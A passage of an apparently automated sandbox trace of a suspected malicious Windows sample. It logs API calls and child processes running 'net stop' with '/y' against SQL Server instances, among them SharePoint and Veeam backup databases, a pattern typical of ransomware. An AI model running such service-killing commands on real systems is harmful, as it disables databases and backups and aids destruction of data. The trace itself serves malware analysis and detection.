lpPerformanceCount=0x18fa78*=1815090800000) returned 1 [0103.992] GetModuleHandleW (lpModuleName=0x0) returned 0xff520000 [0103.992] __set_app_type (_Type=0x1) [0103.992] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff539c9c) returned 0x0 [0103.992] __getmainargs (in: _Argc=0xff544780, _Argv=0xff544790, _Env=0xff544788, _DoWildCard=0, _StartInfo=0xff54479c | out: _Argc=0xff544780, _Argv=0xff544790, _Env=0xff544788) returned 0 [0103.992] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.992] GetConsoleOutputCP () returned 0x1b5 [0104.077] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff54cec0 | out: lpCPInfo=0xff54cec0) returned 1 [0104.077] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0104.079] sprintf_s (in: _DstBuf=0x18fa18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.079] setlocale (category=0, locale=".437") returned="English_United States.437" [0104.081] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.081] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.081] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SHAREPOINT /y" [0104.081] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f7b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0104.081] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0104.081] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fa08 | out: Buffer=0x18fa08*=0x274d50) returned 0x0 [0104.081] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x18fa08 | out: Buffer=0x18fa08*=0x27c100) returned 0x0 [0104.081] _fileno (_File=0x7fefdba2a80) returned 0 [0104.082] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0104.082] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0104.082] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0104.082] _wcsicmp (_String1="config", _String2="stop") returned -16 [0104.082] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0104.082] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0104.082] _wcsicmp (_String1="file", _String2="stop") returned -13 [0104.082] _wcsicmp (_String1="files", _String2="stop") returned -13 [0104.082] _wcsicmp (_String1="group", _String2="stop") returned -12 [0104.082] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0104.082] _wcsicmp (_String1="help", _String2="stop") returned -11 [0104.082] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0104.082] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0104.082] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0104.082] _wcsicmp (_String1="session", _String2="stop") returned -15 [0104.082] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0104.082] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0104.082] _wcsicmp (_String1="share", _String2="stop") returned -12 [0104.082] _wcsicmp (_String1="start", _String2="stop") returned -14 [0104.082] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0104.082] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0104.082] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0104.083] _wcsicmp (_String1="accounts", _String2="MSSQL$SHAREPOINT") returned -12 [0104.083] _wcsicmp (_String1="computer", _String2="MSSQL$SHAREPOINT") returned -10 [0104.083] _wcsicmp (_String1="config", _String2="MSSQL$SHAREPOINT") returned -10 [0104.083] _wcsicmp (_String1="continue", _String2="MSSQL$SHAREPOINT") returned -10 [0104.083] _wcsicmp (_String1="cont", _String2="MSSQL$SHAREPOINT") returned -10 [0104.083] _wcsicmp (_String1="file", _String2="MSSQL$SHAREPOINT") returned -7 [0104.083] _wcsicmp (_String1="files", _String2="MSSQL$SHAREPOINT") returned -7 [0104.083] _wcsicmp (_String1="group", _String2="MSSQL$SHAREPOINT") returned -6 [0104.083] _wcsicmp (_String1="groups", _String2="MSSQL$SHAREPOINT") returned -6 [0104.083] _wcsicmp (_String1="help", _String2="MSSQL$SHAREPOINT") returned -5 [0104.083] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SHAREPOINT") returned -5 [0104.083] _wcsicmp (_String1="localgroup", _String2="MSSQL$SHAREPOINT") returned -1 [0104.083] _wcsicmp (_String1="pause", _String2="MSSQL$SHAREPOINT") returned 3 [0104.083] _wcsicmp (_String1="session", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="sessions", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="sess", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="share", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="start", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="stats", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="statistics", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="stop", _String2="MSSQL$SHAREPOINT") returned 6 [0104.083] _wcsicmp (_String1="time", _String2="MSSQL$SHAREPOINT") returned 7 [0104.083] _wcsicmp (_String1="user", _String2="MSSQL$SHAREPOINT") returned 8 [0104.083] _wcsicmp (_String1="users", _String2="MSSQL$SHAREPOINT") returned 8 [0104.083] _wcsicmp (_String1="msg", _String2="MSSQL$SHAREPOINT") returned -12 [0104.083] _wcsicmp (_String1="messenger", _String2="MSSQL$SHAREPOINT") returned -14 [0104.083] _wcsicmp (_String1="receiver", _String2="MSSQL$SHAREPOINT") returned 5 [0104.083] _wcsicmp (_String1="rcv", _String2="MSSQL$SHAREPOINT") returned 5 [0104.083] _wcsicmp (_String1="netpopup", _String2="MSSQL$SHAREPOINT") returned 1 [0104.083] _wcsicmp (_String1="redirector", _String2="MSSQL$SHAREPOINT") returned 5 [0104.083] _wcsicmp (_String1="redir", _String2="MSSQL$SHAREPOINT") returned 5 [0104.083] _wcsicmp (_String1="rdr", _String2="MSSQL$SHAREPOINT") returned 5 [0104.083] _wcsicmp (_String1="workstation", _String2="MSSQL$SHAREPOINT") returned 10 [0104.084] _wcsicmp (_String1="work", _String2="MSSQL$SHAREPOINT") returned 10 [0104.084] _wcsicmp (_String1="wksta", _String2="MSSQL$SHAREPOINT") returned 10 [0104.084] _wcsicmp (_String1="prdr", _String2="MSSQL$SHAREPOINT") returned 3 [0104.084] _wcsicmp (_String1="devrdr", _String2="MSSQL$SHAREPOINT") returned -9 [0104.084] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SHAREPOINT") returned -1 [0104.084] _wcsicmp (_String1="server", _String2="MSSQL$SHAREPOINT") returned 6 [0104.084] _wcsicmp (_String1="svr", _String2="MSSQL$SHAREPOINT") returned 6 [0104.084] _wcsicmp (_String1="srv", _String2="MSSQL$SHAREPOINT") returned 6 [0104.084] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SHAREPOINT") returned -1 [0104.084] _wcsicmp (_String1="alerter", _String2="MSSQL$SHAREPOINT") returned -12 [0104.084] _wcsicmp (_String1="netlogon", _String2="MSSQL$SHAREPOINT") returned 1 [0104.084] _wcsupr (in: _String="MSSQL$SHAREPOINT" | out: _String="MSSQL$SHAREPOINT") returned="MSSQL$SHAREPOINT" [0104.084] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x27ce10 [0104.088] GetServiceKeyNameW (in: hSCManager=0x27ce10, lpDisplayName="MSSQL$SHAREPOINT", lpServiceName=0xff545750, lpcchBuffer=0x18f928 | out: lpServiceName="", lpcchBuffer=0x18f928) returned 0 [0104.089] _wcsicmp (_String1="msg", _String2="MSSQL$SHAREPOINT") returned -12 [0104.090] _wcsicmp (_String1="messenger", _String2="MSSQL$SHAREPOINT") returned -14 [0104.090] _wcsicmp (_String1="receiver", _String2="MSSQL$SHAREPOINT") returned 5 [0104.090] _wcsicmp (_String1="rcv", _String2="MSSQL$SHAREPOINT") returned 5 [0104.090] _wcsicmp (_String1="redirector", _String2="MSSQL$SHAREPOINT") returned 5 [0104.090] _wcsicmp (_String1="redir", _String2="MSSQL$SHAREPOINT") returned 5 [0104.090] _wcsicmp (_String1="rdr", _String2="MSSQL$SHAREPOINT") returned 5 [0104.090] _wcsicmp (_String1="workstation", _String2="MSSQL$SHAREPOINT") returned 10 [0104.090] _wcsicmp (_String1="work", _String2="MSSQL$SHAREPOINT") returned 10 [0104.090] _wcsicmp (_String1="wksta", _String2="MSSQL$SHAREPOINT") returned 10 [0104.090] _wcsicmp (_String1="prdr", _String2="MSSQL$SHAREPOINT") returned 3 [0104.090] _wcsicmp (_String1="devrdr", _String2="MSSQL$SHAREPOINT") returned -9 [0104.090] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SHAREPOINT") returned -1 [0104.090] _wcsicmp (_String1="server", _String2="MSSQL$SHAREPOINT") returned 6 [0104.090] _wcsicmp (_String1="svr", _String2="MSSQL$SHAREPOINT") returned 6 [0104.090] _wcsicmp (_String1="srv", _String2="MSSQL$SHAREPOINT") returned 6 [0104.090] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SHAREPOINT") returned -1 [0104.090] _wcsicmp (_String1="alerter", _String2="MSSQL$SHAREPOINT") returned -12 [0104.090] _wcsicmp (_String1="netlogon", _String2="MSSQL$SHAREPOINT") returned 1 [0104.090] NetServiceControl (in: servername=0x0, service="MSSQL$SHAREPOINT", opcode=0x0, arg=0x0, bufptr=0x18f930 | out: bufptr=0x18f930) returned 0x889 [0104.091] wcscpy_s (in: _Destination=0xff5480d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.091] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0104.092] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff545b50, nSize=0x800, Arguments=0xff547f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.093] GetFileType (hFile=0xb) returned 0x2 [0104.094] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f7f8 | out: lpMode=0x18f7f8) returned 1 [0104.094] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff545b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x18f7f0, lpReserved=0x0 | out: lpBuffer=0xff545b50*, lpNumberOfCharsWritten=0x18f7f0*=0x1e) returned 1 [0104.094] GetFileType (hFile=0xb) returned 0x2 [0104.094] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f7f8 | out: lpMode=0x18f7f8) returned 1 [0104.095] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff521efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f7f0, lpReserved=0x0 | out: lpBuffer=0xff521efc*, lpNumberOfCharsWritten=0x18f7f0*=0x2) returned 1 [0104.095] _ultow (in: _Dest=0x889, _Radix=1636448 | out: _Dest=0x889) returned="2185" [0104.095] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff545b50, nSize=0x800, Arguments=0xff547f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.095] GetFileType (hFile=0xb) returned 0x2 [0104.095] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f7f8 | out: lpMode=0x18f7f8) returned 1 [0104.096] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff545b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x18f7f0, lpReserved=0x0 | out: lpBuffer=0xff545b50*, lpNumberOfCharsWritten=0x18f7f0*=0x34) returned 1 [0104.096] GetFileType (hFile=0xb) returned 0x2 [0104.096] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f7f8 | out: lpMode=0x18f7f8) returned 1 [0104.096] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff521efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18f7f0, lpReserved=0x0 | out: lpBuffer=0xff521efc*, lpNumberOfCharsWritten=0x18f7f0*=0x2) returned 1 [0104.097] NetApiBufferFree (Buffer=0x274d50) returned 0x0 [0104.097] NetApiBufferFree (Buffer=0x27c100) returned 0x0 [0104.097] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SHAREPOINT /y" [0104.097] exit (_Code=2) Process: id = "194" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5abc6000" os_pid = "0xa8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7850 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7851 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7852 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7853 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7854 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7855 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7856 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7857 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7858 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7859 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7860 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 7861 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7862 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 7863 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7864 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8013 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8014 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8015 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8016 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8017 start_va = 0x640000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 8018 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8019 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8020 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 8021 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8022 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8023 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8024 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8025 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8026 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8027 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8028 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8029 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8030 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8031 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8032 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 640 os_tid = 0xa20 Process: id = "195" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x591e5000" os_pid = "0x418" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7891 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7892 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7893 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7894 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7895 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7896 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7897 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7898 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7899 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7900 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7901 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7902 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 7903 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7904 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 642 os_tid = 0x55c Process: id = "196" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x57cae000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "190" os_parent_pid = "0x1350" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7905 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7906 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7907 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7908 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7909 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7910 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7911 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7912 start_va = 0xff6d0000 end_va = 0xff702fff entry_point = 0xff6d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7913 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7914 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7915 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7916 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7947 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7948 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7949 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7974 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7975 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7976 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7977 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 7978 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 7979 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7980 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7981 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7982 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7983 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7984 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7985 start_va = 0x7fefb7e0000 end_va = 